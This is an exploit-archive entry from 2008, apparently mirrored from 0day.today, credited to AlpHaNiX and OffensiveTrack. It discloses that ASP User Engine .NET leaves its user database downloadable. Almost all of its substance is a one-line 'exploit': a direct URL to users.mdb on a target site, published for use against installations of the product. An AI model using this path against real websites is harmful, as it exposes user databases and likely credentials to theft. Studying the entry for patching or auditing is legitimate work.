id: 4342
date: 12/03/2008
title: ASP User Engine .NET Remote Database Disclosure Vulnerability
author: AlpHaNiX
cves: 

=============================================================
ASP User Engine .NET Remote Database Disclosure Vulnerability
=============================================================


###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


----------------------------------------------------------


#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################

#script   : ASP User Engine .NET
#download : http://shop.robs-projects.com/UE_DotNET.html



#Exploit :
http://target.com/users.mdb


#special thanks for the dear DexTer for his help :$

###########################################################################



#  0day.today [2023-03-23]  #